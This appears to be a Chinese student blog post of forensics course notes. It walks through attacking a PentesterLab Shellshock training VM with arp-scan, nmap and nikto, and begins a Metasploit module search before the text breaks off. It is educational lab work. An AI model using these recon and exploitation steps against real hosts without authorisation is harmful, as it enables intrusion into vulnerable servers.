<!DOCTYPE html><html lang="zh-TW" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5"><title>數位鑑識筆記 - Shellshock | SUSU's BLOG</title><meta name="description" content="數位鑑識筆記 - Shellshock"><meta name="keywords" content="Digital forensics,Linux"><meta name="author" content="SUSU"><meta name="copyright" content="SUSU"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><link rel="preconnect" href="//busuanzi.ibruce.info"><meta name="google-site-verification" content="google-site-verification=BVjq85QtM1ejI-lD_4FfPiOJGFi_y_396uGllb_WK78"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="數位鑑識筆記 - Shellshock"><meta name="twitter:description" content="數位鑑識筆記 - Shellshock"><meta name="twitter:image" content="https://imgur.com/4WtLHTa.jpg"><meta property="og:type" content="article"><meta property="og:title" content="數位鑑識筆記 - Shellshock"><meta property="og:url" content="https://sunick2009.github.io/2021/12/05/digital_forensics_2021_12_05/"><meta property="og:site_name" content="SUSU's BLOG"><meta property="og:description" content="數位鑑識筆記 - Shellshock"><meta property="og:image" content="https://imgur.com/4WtLHTa.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = 'false'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://sunick2009.github.io/2021/12/05/digital_forensics_2021_12_05/"><link rel="prev" title="數位鑑識筆記 - SMBLoris" href="https://sunick2009.github.io/2022/03/05/digital_forensics_2022_03_05/"><link rel="next" title="升級Linux" href="https://sunick2009.github.io/2020/02/23/note_1/"><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-158679472-1', 'auto');
ga('send', 'pageview');
</script><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查詢的內容:${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://xxx/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  copy: {
    success: '複製成功',
    error: '複製錯誤',
    noSupport: '瀏覽器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '鍵將本頁加入書籤'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  isHome: false,
  isPost: true
  
}</script><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="SUSU's BLOG" type="application/atom+xml">
</head><body><header> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">SUSU's BLOG</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首頁</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 時間軸</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 標籤</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分類</span></a></div><div class="menus_item"><a class="site-page" href="/message%20board/"><i class="fa-fw fa fa-comments"></i><span> 留言板</span></a></div></div></span><span class="pull_right" id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></span></div></header><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://imgur.com/BwKsEfG.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">5</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">標籤</div><div class="length_num">8</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分類</div><div class="length_num">2</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首頁</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 時間軸</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 標籤</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分類</span></a></div><div class="menus_item"><a class="site-page" href="/message%20board/"><i class="fa-fw fa fa-comments"></i><span> 留言板</span></a></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目錄</div><div class="sidebar-toc__content"><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#導言"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">導言</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#主題"><span class="toc_mobile_items-number">2.</span> <span class="toc_mobile_items-text">主題</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#安裝此環境"><span class="toc_mobile_items-number">2.1.</span> <span class="toc_mobile_items-text">安裝此環境</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#攻擊"><span class="toc_mobile_items-number">3.</span> <span class="toc_mobile_items-text">攻擊</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#需先準備軟體"><span class="toc_mobile_items-number">3.0.1.</span> <span class="toc_mobile_items-text">需先準備軟體</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#攻擊流程"><span class="toc_mobile_items-number">3.1.</span> <span class="toc_mobile_items-text">攻擊流程</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#1-先使用arp-scan找到我們的目標主機"><span class="toc_mobile_items-number">3.1.1.</span> <span class="toc_mobile_items-text">1. 先使用arp-scan找到我們的目標主機</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#2-使用nmap尋找目標主機有哪些服務"><span class="toc_mobile_items-number">3.1.2.</span> <span class="toc_mobile_items-text">2. 使用nmap尋找目標主機有哪些服務</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#3-尋找弱點"><span class="toc_mobile_items-number">3.1.3.</span> <span class="toc_mobile_items-text">3. 尋找弱點</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#4-使用metasploit進行攻擊"><span class="toc_mobile_items-number">3.1.4.</span> <span class="toc_mobile_items-text">4. 使用metasploit進行攻擊</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-5"><a class="toc_mobile_items-link" href="#1-啟動metasploit並尋找shellshock相關攻擊"><span class="toc_mobile_items-number">3.1.4.1.</span> <span class="toc_mobile_items-text">(1) 啟動metasploit並尋找shellshock相關攻擊</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-5"><a class="toc_mobile_items-link" href="#2-use-我們找到的辦法"><span class="toc_mobile_items-number">3.1.4.2.</span> <span class="toc_mobile_items-text">(2) use 我們找到的辦法</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-5"><a class="toc_mobile_items-link" href="#3-設定options"><span class="toc_mobile_items-number">3.1.4.3.</span> <span class="toc_mobile_items-text">(3) 設定options</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-5"><a class="toc_mobile_items-link" href="#4-攻擊"><span class="toc_mobile_items-number">3.1.4.4.</span> <span class="toc_mobile_items-text">(4) 攻擊</span></a></li></ol></li></ol></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#鑑識"><span class="toc_mobile_items-number">4.</span> <span class="toc_mobile_items-text">鑑識</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#需先準備軟體-v2"><span class="toc_mobile_items-number">4.0.1.</span> <span class="toc_mobile_items-text">需先準備軟體</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#Wireshark"><span class="toc_mobile_items-number">4.0.2.</span> <span class="toc_mobile_items-text">Wireshark</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#在受害主機上尋找殘骸"><span class="toc_mobile_items-number">4.0.3.</span> <span class="toc_mobile_items-text">在受害主機上尋找殘骸</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-5"><a class="toc_mobile_items-link" href="#1-查詢網路連接狀況"><span class="toc_mobile_items-number">4.0.3.1.</span> <span class="toc_mobile_items-text">1. 查詢網路連接狀況</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-5"><a class="toc_mobile_items-link" href="#2-查詢可疑程式"><span class="toc_mobile_items-number">4.0.3.2.</span> <span class="toc_mobile_items-text">2. 查詢可疑程式</span></a></li></ol></li></ol></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#補充"><span class="toc_mobile_items-number">5.</span> <span class="toc_mobile_items-text">補充</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#Log"><span class="toc_mobile_items-number">5.0.1.</span> <span class="toc_mobile_items-text">Log</span></a></li></ol></li></ol></li></ol></div></div></div><div id="body-wrap"><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目錄</div><div class="sidebar-toc__progress"><span class="progress-notice">你已經讀了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#導言"><span class="toc-number">1.</span> <span class="toc-text">導言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#主題"><span class="toc-number">2.</span> <span class="toc-text">主題</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#安裝此環境"><span class="toc-number">2.1.</span> <span class="toc-text">安裝此環境</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#攻擊"><span class="toc-number">3.</span> <span class="toc-text">攻擊</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#需先準備軟體"><span class="toc-number">3.0.1.</span> <span class="toc-text">需先準備軟體</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#攻擊流程"><span class="toc-number">3.1.</span> <span class="toc-text">攻擊流程</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-先使用arp-scan找到我們的目標主機"><span class="toc-number">3.1.1.</span> <span class="toc-text">1. 先使用arp-scan找到我們的目標主機</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-使用nmap尋找目標主機有哪些服務"><span class="toc-number">3.1.2.</span> <span class="toc-text">2. 使用nmap尋找目標主機有哪些服務</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-尋找弱點"><span class="toc-number">3.1.3.</span> <span class="toc-text">3. 尋找弱點</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-使用metasploit進行攻擊"><span class="toc-number">3.1.4.</span> <span class="toc-text">4. 使用metasploit進行攻擊</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-啟動metasploit並尋找shellshock相關攻擊"><span class="toc-number">3.1.4.1.</span> <span class="toc-text">(1) 啟動metasploit並尋找shellshock相關攻擊</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-use-我們找到的辦法"><span class="toc-number">3.1.4.2.</span> <span class="toc-text">(2) use 我們找到的辦法</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-設定options"><span class="toc-number">3.1.4.3.</span> <span class="toc-text">(3) 設定options</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4-攻擊"><span class="toc-number">3.1.4.4.</span> <span class="toc-text">(4) 攻擊</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#鑑識"><span class="toc-number">4.</span> <span class="toc-text">鑑識</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#需先準備軟體-v2"><span class="toc-number">4.0.1.</span> <span class="toc-text">需先準備軟體</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Wireshark"><span class="toc-number">4.0.2.</span> <span class="toc-text">Wireshark</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#在受害主機上尋找殘骸"><span class="toc-number">4.0.3.</span> <span class="toc-text">在受害主機上尋找殘骸</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-查詢網路連接狀況"><span class="toc-number">4.0.3.1.</span> <span class="toc-text">1. 查詢網路連接狀況</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-查詢可疑程式"><span class="toc-number">4.0.3.2.</span> <span class="toc-text">2. 查詢可疑程式</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#補充"><span class="toc-number">5.</span> <span class="toc-text">補充</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Log"><span class="toc-number">5.0.1.</span> <span class="toc-text">Log</span></a></li></ol></li></ol></li></ol></div></div></div><main id="content-outer"><div id="top-container" style="background-image: url(https://imgur.com/4WtLHTa.jpg)"><div id="post-info"><div id="post-title"><div class="posttitle">數位鑑識筆記 - Shellshock</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 發表於 2021-12-05<span class="post-meta__separator">|</span><i class="fa fa-history fa-fw" aria-hidden="true"></i> 更新於 2022-12-04</time><span class="post-meta__separator">|</span><span><i class="fa fa-inbox post-meta__icon fa-fw" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E7%AD%86%E8%A8%98/">筆記</a></span><div class="post-meta-wordcount"><i class="fa fa-file-word-o post-meta__icon fa-fw" aria-hidden="true"></i><span>字數總計:</span><span class="word-count">3.1k</span><span class="post-meta__separator">|</span><i class="fa fa-clock-o post-meta__icon fa-fw" aria-hidden="true"></i><span>閲讀時長: 15 分鐘</span><div class="post-meta-pv-cv"><span class="post-meta__separator">|</span><span><i class="fa fa-eye post-meta__icon fa-fw" aria-hidden="true"> </i>閲讀量:</span><span id="busuanzi_value_page_pv"></span></div></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><h2 id="導言">導言</h2>
<p>最近正在上學校裡上數位鑑識相關課程<br>
老師推薦的學習方式是每練習一次攻擊後，得利用各種工具及指令找出攻擊痕跡</p>
<p>所以這一系列的筆記總共會分為兩個部分</p>
<ul>
<li>攻擊過程</li>
<li>鑑識過程</li>
</ul>
<p>事不宜遲，總共約一個月的課程，期望自己能每次上完課都能更新<img class="emoji lazyload" draggable="false" alt="😆" data-src="https://twemoji.maxcdn.com/v/12.1.6/72x72/1f606.png" src="https://i.imgur.com/WS5Q2x3.gif"></p>
<hr>
<h2 id="主題">主題</h2>
<p>本次練習的攻擊手法為<a href="https://zh.wikipedia.org/wiki/Shellshock" target="_blank" rel="noopener"><strong>Shellshock</strong>(CVE-2014-6271)</a><br>
<a href="https://imgur.com/5WKRpL0.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="undefined" class="fancybox"><img width="50%" height="50%" data-src="https://imgur.com/5WKRpL0.png" src="https://i.imgur.com/WS5Q2x3.gif" class="lazyload"></a><br>
這邊引述一下維基百科的介紹</p>
<blockquote>
<p>Shellshock，又稱Bashdoor[1]，是在Unix中廣泛使用的Bash shell中的一個安全漏洞[2]，首次於2014年9月24日公開。許多網際網路守護行程，如網頁伺服器，使用bash來處理某些命令，從而允許攻擊者在易受攻擊的Bash版本上執行任意代碼。這可使攻擊者在未授權的情況下存取電腦系統[3]。 --引用自維基百科</p>
</blockquote>
<p>這次受害者的環境是講師所提供的iso檔<br>
來自<em>PENTESTER LAB</em>，可至此網站下載一模一樣的練習環境<br>
<a href="https://www.vulnhub.com/entry/pentester-lab-cve-2014-6271-shellshock,104/" target="_blank" rel="noopener">Pentester Lab: CVE-2014-6271: ShellShock</a></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> cat /proc/version</span></span><br><span class="line">Linux version 3.14.1-pentesterlab (root@builder32) (gcc version 4.4.5 (Debian 4.4.5-8) ) #1 SMP Sun Jul 6 09:16:00 EST 2014</span><br></pre></td></tr></table></figure></div>
<h3 id="安裝此環境">安裝此環境</h3>
<p>第一次看到這麼小的iso我都還不知道怎麼安裝(約30MB左右)，原來這東西就跟我們裝開機蝶的那種環境類似<br>
直接新增一台虛擬機的環境下，並載入就好它會自行啟動配置好了</p>
<a href="https://imgur.com/h3F9pfM.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="undefined" class="fancybox"><img width="50%" height="50%" data-src="https://imgur.com/h3F9pfM.png" src="https://i.imgur.com/WS5Q2x3.gif" class="lazyload"></a>
<hr>
<h2 id="攻擊">攻擊</h2>
<h4 id="需先準備軟體">需先準備軟體</h4>
<ol>
<li><strong>nmap</strong></li>
<li><strong>nikto</strong></li>
<li><strong>arp-scan</strong></li>
<li><strong>metasploit</strong><br>
基本上準備個Kali Linux就能操作這次攻擊</li>
</ol>
<h3 id="攻擊流程">攻擊流程</h3>
<h4 id="1-先使用arp-scan找到我們的目標主機">1. 先使用<strong>arp-scan</strong>找到我們的目標主機</h4>
<p>這一步也可使用各種工具找到對方即可<br>
或是直接在目標主機輸入ifconfig</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> sudo arp-scan -l         </span></span><br><span class="line">[sudo] password for susu: </span><br><span class="line">Interface: eth0, type: EN10MB, MAC: ***********, IPv4: 192.168.20.134</span><br><span class="line">Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)</span><br><span class="line">192.168.20.1	00:50:56:c0:00:08	VMware, Inc.</span><br><span class="line">192.168.20.2	00:50:56:e6:11:13	VMware, Inc.</span><br><span class="line">192.168.20.131	00:0c:29:86:4c:69	VMware, Inc. &lt;------這次的目標</span><br><span class="line">192.168.20.254	00:50:56:e3:02:85	VMware, Inc.</span><br></pre></td></tr></table></figure></div>
<h4 id="2-使用nmap尋找目標主機有哪些服務">2. 使用nmap尋找目標主機有哪些服務</h4>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> nmap -A 192.168.20.131</span></span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-05 15:35 CST</span><br><span class="line">Nmap scan report for 192.168.20.131</span><br><span class="line">Host is up (0.0013s latency).</span><br><span class="line">Not shown: 998 closed ports</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 6.0 (protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   1024 8b:4c:a0:14:1c:3c:8c:29:3a:16:1c:f8:1a:70:2a:f3 (DSA)</span><br><span class="line">|   2048 d9:91:5d:c3:ed:78:b5:8c:9a:22:34:69:d5:68:6d:4e (RSA)</span><br><span class="line">|_  256 b2:23:9a:fa:a7:7a:cb:cd:30:85:f9:cb:b8:17:ae:05 (ECDSA)</span><br><span class="line">80/tcp open  http    Apache httpd 2.2.21 ((Unix) DAV/2)</span><br><span class="line">| http-methods: </span><br><span class="line">|_  Potentially risky methods: TRACE</span><br><span class="line">|_http-server-header: Apache/2.2.21 (Unix) DAV/2</span><br><span class="line">|_http-title: [PentesterLab] CVE-2014-6271</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 7.13 seconds</span><br></pre></td></tr></table></figure></div>
<h4 id="3-尋找弱點">3. 尋找弱點</h4>
<p>從nmap中我們可發現web服務的存在，我們再使用主要用來掃網頁用的<strong>nikto</strong>來進一步的掃描</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> nikto -h 192.168.20.131</span></span><br><span class="line">- Nikto v2.1.6</span><br><span class="line">---------------------------------------------------------------------------</span><br><span class="line">+ Target IP:          192.168.20.131</span><br><span class="line">+ Target Hostname:    192.168.20.131</span><br><span class="line">+ Target Port:        80</span><br><span class="line">+ Start Time:         2021-12-05 15:35:33 (GMT8)</span><br><span class="line">---------------------------------------------------------------------------</span><br><span class="line">+ Server: Apache/2.2.21 (Unix) DAV/2</span><br><span class="line">+ Server may leak inodes via ETags, header found with file /, inode: 7725, size: 1704, mtime: Thu Sep 25 17:56:50 2014</span><br><span class="line">+ The anti-clickjacking X-Frame-Options header is not present.</span><br><span class="line">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</span><br><span class="line">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</span><br><span class="line">+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.</span><br><span class="line">+ Uncommon header '93e4r0-cve-2014-6278' found, with contents: true</span><br><span class="line">+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).</span><br><span class="line">+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE </span><br><span class="line">+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST</span><br><span class="line">+ OSVDB-3268: /css/: Directory indexing found.</span><br><span class="line">+ OSVDB-3092: /css/: This might be interesting...</span><br><span class="line">+ 8725 requests: 0 error(s) and 11 item(s) reported on remote host</span><br><span class="line">+ End Time:           2021-12-05 15:36:01 (GMT8) (28 seconds)</span><br><span class="line">---------------------------------------------------------------------------</span><br><span class="line">+ 1 host(s) tested</span><br></pre></td></tr></table></figure></div>
<p>我們可在報告中發現在<code>/cgi-bin/status</code>有可疑漏洞</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).</span><br></pre></td></tr></table></figure></div>
<h4 id="4-使用metasploit進行攻擊">4. 使用metasploit進行攻擊</h4>
<h5 id="1-啟動metasploit並尋找shellshock相關攻擊">(1) <strong>啟動metasploit並尋找shellshock相關攻擊</strong></h5>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> msfconsole</span></span><br><span class="line">msf6 &gt; search shellshock</span><br><span class="line"></span><br><span class="line">Matching Modules</span><br><span class="line">================</span><br><span class="line"></span><br><span class="line"><span class="meta">   #</span><span class="bash">   Name                                               Disclosure Date  Rank       Check  Description</span></span><br><span class="line">   -   ----                                               ---------------  ----       -----  -----------</span><br><span class="line">   0   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)</span><br><span class="line">   1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)</span><br><span class="line">   2   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner</span><br><span class="line">   3   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    